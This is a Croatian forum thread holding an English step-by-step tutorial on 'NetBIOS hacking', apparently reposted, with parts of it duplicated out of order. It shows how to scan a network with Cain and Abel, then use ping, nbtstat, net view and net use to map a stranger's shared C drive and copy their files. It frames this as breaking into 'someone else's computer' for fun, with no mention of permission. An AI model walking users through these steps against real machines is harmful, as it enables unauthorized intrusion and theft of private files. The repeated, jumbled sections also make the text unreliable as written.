Let's get back to the hacking.
Type in "ping (IP address of the target)." For example in this tutorial, "ping 192.168.1.103."
This will tell us if the target is online.
If it worked, it will look something like this (note, I have colored out private information):
IF it didn't work, meaning that the target is not online, it will look something like this:
If the target is not online, either switch to a different target, or try another time. If the target is online, then we can proceed.
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
-[Part 3, Gathering the Information.]-
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
Now, input this command "nbtstat a (IP address of target)." An example would be "nbtstat a 192.168.1.103."
This will show us if there is file sharing enabled, and if there is, it will give us the: currently logged on user, workgroup, and computer name.
Ok, you're probably wondering, "What does all this mean to me?" Well, this is actually very important, without this, the hack would not work. So, let me break it down from the top to bottom. I will just give the first line of information, and then explain the paragraph that follows it.
The information right below the original command says: "Local Area Connection," this information tells us about our connection through the LAN, and in my case, I am not connected through LAN, so the host is not found, and there is no IP.
The information right below the "Local Area Connection," is "Wireless Network Connection 2:" It gives us information about the connection to the target through WAN. In my case I am connected through the WAN, so it was able to find the Node IpAddress. The Node IpAddress is the local area IP of the computer you are going to break into.
The NetBIOS Remote Machine Name Table, give us the workgroup of our computer, tells us if it is shared, and gives us the computer name. Sometimes it will even give us the currently logged on user, but in my case, it didn't. BATGIRL is the name of the computer I am trying to connect to. If you look to the right you should see a <20>. This means that file sharing is enabled on BATGIRL. If there was not a <20> to the right of the Name, then you have reached a dead end and need to go find another IP, or quit for now. Below BATGIRL is the computers workgroup, SUPERHEROES. If you are confused about which one is the workgroup, and the computer, look under the Type category to the right of the < > for every Name. If it says UNIQUE, it is one system, such as a printer or computer. If it is GROUP, then it is the workgroup
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
-[Step 4, Breaking In]-
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
Finally it's time.
By now we know: that our target is online, our target has file sharing, and our target's computer name.
So it's time to break in.
We will now locate the shared drives, folders, files, or printers. Type in "net view \\(IP Address of Target)"
An example for this tutorial would be: "net view \\192.168.1.103
We have our just found our share name. In this case, under the share name is "C," meaning that the only shared thing on the computer is C. Then to the right, under Type, it says "Disk." This means that it is the actual C DISK of the computer. The C DISK can sometimes be an entire person's hard drive.
All's that is left to do is "map" the shared drive onto our computer. This means that we will make a drive on our computer, and all the contents of the targets computer can be accessed through our created network drive. Type in "net use K: \\(IP Address of Target)\(Shared Drive). For my example in this tutorial, "net use K: \\192.168.1.103\C." Ok, let's say that you plan on doing this again to a different person, do u see the "K after "net use?" This is the letter of the drive that you are making on your computer. It can be any letter you wish, as long as the same letter is not in use by your computer. So it could be "net use G...," for a different target.
As you can see, for my hack I have already used "K," so I used "G" instead.
You may also do the same for multiple hacks.
If it worked, it will say "The command completed successfully."
If not, you will have to go retrace you steps.
Now open up "my computer" under the start menu, and your newly created network drive should be there.
Now, if you disconnect from the WAN or LAN, you will not be able to access this drive, hence the name Network Drive.
The drive will not be deleted after you disconnect though, but you won't be able to access it until you reconnect to the network.
So if you are doing this for the content of the drive, I recommend dragging the files and folders inside of the drive onto your computer,
because you never know if the target changes the sharing setting.
If you are just doing this to hack something, then go explore it and have some well deserved fun!
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++
ENJOY !!!
NetBIOS Hacking is the art of hacking into someone else's computer through your computer. NetBIOS stands for "Network Basic Input Output System." It is a way for a LAN or WAN to share folders, files, drives, and printers.
-How can this be of use to me?-
Most people don't even know, but when they're on a LAN or WAN they could possibly have their entire hard drive shared and not even know. So if we can find a way into the network, their computer is at our disposal.
-What do I need?-
Windows OS
Cain and Abel - get it from here
http://www.oxid.it/
Lets Start Then shuriken.gif
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
-[Step 1, Finding the target.]-
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
So first off we need to find a computer or the computer to hack into. So if your plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local subnet. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross
Another window will pop up, make sure "All host in my subnet" is selected, and then click ok.
It should begin to scan.
Then IP's, computer names, and mac addresses will show up.
Now remember the IP address of the computer you are going to be breaking into.
If you can't tell whether the IP address is a computer, router, modem, etc, that's ok.
During the next step we will begin our trial and error.
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
-[Part 2, Trial and Error]-
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
Now, we don't know if we have our designated target, or if we have a computer or printer, or whatever else is on the LAN or WAN.
If you did get the IP of the target though, I still recommend reading through this section, for it could be helpful later on.
Click on the start menu and go to run, type in cmd, and click ok.
This should bring up the command prompt.
From here we will do most of the hacking.
Now I will be referring to certain commands that need to be inputted into the command prompt.
I will put these commands in quotes, but do not put the quotes in the code when you type it into the prompt.
I am only doing this to avoid confusion.
Let's get back to the hacking.
Type in "ping (IP address of the target)." For example in this tutorial, "ping 192.168.1.103."
This will tell us if the target is online.
If it worked, it will look something like this (note, I have colored out private information):
IF it didn't work, meaning that the target is not online, it will look something like this:
If the target is not online, either switch to a different target, or try another time. If the target is online, then we can proceed.
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
-[Part 3, Gathering the Information.]-
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
Now, input this command "nbtstat a (IP address of target)." An example would be "nbtstat a 192.168.1.103."
This will show us if there is file sharing enabled, and if there is, it will give us the: currently logged on user, workgroup, and computer name.
Ok, you're probably wondering, "What does all this mean to me?" Well, this is actually very important, without this, the hack would not work. So, let me break it down from the top to bottom. I will just give the first line of information, and then explain the paragraph that follows it.
The information right below the original command says: "Local Area Connection," this information tells us about our connection through the LAN, and in my case, I am not connected through LAN, so the host is not found, and there is no IP.
The information right below the "Local Area Connection," is "Wireless Network Connection 2:" It gives us information about the connection to the target through WAN. In my case I am connected through the WAN, so it was able to find the Node IpAddress. The Node IpAddress is the local area IP of the computer you are going to break into.
The NetBIOS Remote Machine Name Table, give us the workgroup of our computer, tells us if it is shared, and gives us the computer name. Sometimes it will even give us the currently logged on user, but in my case, it didn't. BATGIRL is the name of the computer I am trying to connect to. If you look to the right you should see a <20>. This means that file sharing is enabled on BATGIRL. If there was not a <20> to the right of the Name, then you have reached a dead end and need to go find another IP, or quit for now. Below BATGIRL is the computers workgroup, SUPERHEROES. If you are confused about which one is the workgroup, and the computer, look under the Type category to the right of the < > for every Name. If it says UNIQUE, it is one system, such as a printer or computer. If it is GROUP, then it is the workgroup
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
-[Step 4, Breaking In]-
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++
Finally it's time.
By now we know: that our target is online, our target has file sharing, and our target's computer name.
So it's time to break in.
We will now locate the shared drives, folders, files, or printers. Type in "net view \\(IP Address of Target)"
An example for this tutorial would be: "net view \\192.168.1.103
We have our just found our share name. In this case, under the share name is "C," meaning that the only shared thing on the computer is C. Then to the right, under Type, it says "Disk." This means that it is the actual C DISK of the computer. The C DISK can sometimes be an entire person's hard drive.
All's that is left to do is "map" the shared drive onto our computer. This means that we will make a drive on our computer, and all the contents of the targets computer can be accessed through our created network drive. Type in "net use K: \\(IP Address of Target)\(Shared Drive). For my example in this tutorial, "net use K: \\192.168.1.103\C." Ok, let's say that you plan on doing this again to a different person, do u see the "K after "net use?" This is the letter of the drive that you are making on your computer. It can be any letter you wish, as long as the same letter is not in use by your computer. So it could be "net use G...," for a different target.
As you can see, for my hack I have already used "K," so I used "G" instead.
You may also do the same for multiple hacks.
If it worked, it will say "The command completed successfully."
If not, you will have to go retrace you steps.
Now open up "my computer" under the start menu, and your newly created network drive should be there.
Now, if you disconnect from the WAN or LAN, you will not be able to access this drive, hence the name Network Drive.
The drive will not be deleted after you disconnect though, but you won't be able to access it until you reconnect to the network.
So if you are doing this for the content of the drive, I recommend dragging the files and folders inside of the drive onto your computer,
because you never know if the target changes the sharing setting.
If you are just doing this to hack something, then go explore it and have some well deserved fun!
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++
ENJOY !!!
Re: Tricks !!!
a zasto pisete sve na eng
pa pisite na hr neda mi se prevađati
pa pisite na hr neda mi se prevađati
powercolor- Broj postova : 5
Join date : 07.06.2008
Age : 29
Lokacija : Varazdin
reeeee
powercolor je napisao/la:a zasto pisete sve na eng
pa pisite na hr neda mi se prevađati
pisem zato da bi i stranci ako se registriraju da i oni razumiju sto pise.
Similar topics
» All Windows tricks
» Cool Windows Tricks Part 2
» Windows Tricks #2: fool your friends!
» Windows Tricks #1- Star Wras Easter Egg.
» Cool Windows Tricks Part 2
» Windows Tricks #2: fool your friends!
» Windows Tricks #1- Star Wras Easter Egg.
Stranica 1 / 1.
Permissions in this forum:
Ne možeš odgovarati na postove.
|
|